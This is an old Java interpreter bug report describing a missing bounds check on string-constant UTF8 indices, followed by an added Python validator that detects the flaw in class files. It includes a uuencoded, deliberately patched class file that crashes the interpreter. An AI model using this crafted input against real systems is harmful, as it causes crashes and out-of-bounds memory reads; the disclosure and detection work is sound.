In classinitialize.c:Locked_ResolveClassConstant(),
resolving a string constant does not check if the index to
the UTF8 is valid. Patching the constant table of a .class
file to include a large index for a string constant can cause
the java interpreter to SEGV.
Included below is a uuencoded class file that has been
patched and causes java to crash.
begin 664 test.class
MROZZO@ # "T 'P@Q$@< &P< %@< #P< '@H ! +"0 " H* , "0P &0 =
M# - !H, P %0$ !W!R:6YT;&X! -E<G(! U#;VYS=&%N=%9A;'5E 0 3
M:F%V82]I;R]0<FEN=%-T<F5A;0$ "D5X8V5P=&EO;G,! I3;W5R8V5&:6QE
M 0 %:&5L;&\\! Y,;V-A;%9A<FEA8FQE<P$ !$-O9&4! !4H3&IA=F$O;&%N
M9R]3=')I;F<[*58! !!J879A+VQA;F<O3V)J96-T 0 $;6%I;@$ %BA;3&IA
M=F$O;&%N9R]3=')I;F<[*58! 8\\:6YI=#X! !5,:F%V82]I;R]0<FEN=%-T
M<F5A;3L! !!J879A+VQA;F<O4WES=&5M 0 )=&5S="YJ879A 0 #*"E6 0 $
M=&5S= 4 P @ ) !< & ! !0 5 ( FR <2 ;8
M!K$ $ &0 = $ % !$ 0 ! !2JW BQ ! !$ "
" !P
end
-Theron, 13 Oct 95
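As an added example (not part of Theron's post and not Sun's interpreter code), the following Python parses a class file's header and constant pool and performs the bounds check the post says Locked_ResolveClassConstant() omits: every CONSTANT_String entry's string_index must lie inside the pool and name a CONSTANT_Utf8 entry. The sample class-file prefixes are constructed inline for the test (they contain only a header and a two-entry pool, not a complete class); function names, the fixed-size tag table and the reason strings are my own choices.

```python
import struct

MAGIC = 0xCAFEBABE
CONSTANT_UTF8 = 1
CONSTANT_LONG = 5
CONSTANT_DOUBLE = 6
CONSTANT_CLASS = 7
CONSTANT_STRING = 8

# Payload size in bytes for every fixed-size constant-pool tag
# (3 Integer, 4 Float, 5 Long, 6 Double, 7 Class, 8 String,
#  9 Fieldref, 10 Methodref, 11 InterfaceMethodref, 12 NameAndType).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4}


def parse_constant_pool(data):
    """Parse the class-file header and constant pool.

    Returns (constant_pool_count, pool) where pool maps a 1-based index to
    (tag, payload).  Every read is bounds-checked against len(data), so a
    truncated file raises ValueError instead of reading past the buffer.
    """
    if len(data) < 10:
        raise ValueError("truncated header")
    magic, _minor, _major, count = struct.unpack(">IHHH", data[:10])
    if magic != MAGIC:
        raise ValueError("bad magic 0x%08x" % magic)
    pool = {}
    off = 10
    idx = 1
    while idx < count:                      # valid indices are 1 .. count-1
        if off >= len(data):
            raise ValueError("truncated constant pool at index %d" % idx)
        tag = data[off]
        off += 1
        if tag == CONSTANT_UTF8:
            if off + 2 > len(data):
                raise ValueError("truncated Utf8 length at index %d" % idx)
            (length,) = struct.unpack(">H", data[off:off + 2])
            off += 2
            if off + length > len(data):
                raise ValueError("truncated Utf8 bytes at index %d" % idx)
            pool[idx] = (tag, data[off:off + length])
            off += length
        elif tag in _FIXED:
            size = _FIXED[tag]
            if off + size > len(data):
                raise ValueError("truncated entry at index %d" % idx)
            raw = data[off:off + size]
            off += size
            if size == 2:                   # Class / String: one u2 index
                pool[idx] = (tag, struct.unpack(">H", raw))
            elif tag >= CONSTANT_CLASS:     # ref / NameAndType: two u2 indices
                pool[idx] = (tag, struct.unpack(">HH", raw))
            else:                           # numeric constants: keep raw bytes
                pool[idx] = (tag, raw)
        else:
            raise ValueError("unknown tag %d at index %d" % (tag, idx))
        # Long and Double occupy two consecutive pool slots.
        idx += 2 if tag in (CONSTANT_LONG, CONSTANT_DOUBLE) else 1
    return count, pool


def check_string_constants(data):
    """Return [(entry_index, string_index, reason)] for each CONSTANT_String
    whose string_index is out of range or does not name a Utf8 entry.
    An empty list means every string constant resolves safely."""
    count, pool = parse_constant_pool(data)
    problems = []
    for idx, (tag, payload) in sorted(pool.items()):
        if tag != CONSTANT_STRING:
            continue
        (sidx,) = payload
        if not 1 <= sidx < count:
            problems.append((idx, sidx, "index out of range"))
        elif sidx not in pool or pool[sidx][0] != CONSTANT_UTF8:
            problems.append((idx, sidx, "does not refer to a Utf8 entry"))
    return problems


# --- constructed sample input (not the class file from the post) ---------
def _utf8(text):
    b = text.encode("utf-8")
    return bytes([CONSTANT_UTF8]) + struct.pack(">H", len(b)) + b


def _string(string_index):
    return bytes([CONSTANT_STRING]) + struct.pack(">H", string_index)


def build_sample(string_index):
    """Header (minor 3, major 45, as in 1995-era class files) plus a pool of
    #1 Utf8 "hello" and #2 String -> string_index.  Hypothetical test data."""
    entries = [_utf8("hello"), _string(string_index)]
    header = struct.pack(">IHHH", MAGIC, 3, 45, len(entries) + 1)
    return header + b"".join(entries)


if __name__ == "__main__":
    print("well-formed:", check_string_constants(build_sample(1)))
    print("oversized index:", check_string_constants(build_sample(0x7FFF)))
```

Pointing check_string_constants() at the bytes of any real .class file (open(path, "rb").read()) reports the same condition the post describes before a loader ever dereferences the index; a loader or verifier that rejects the file on a non-empty result cannot be driven into the out-of-bounds read.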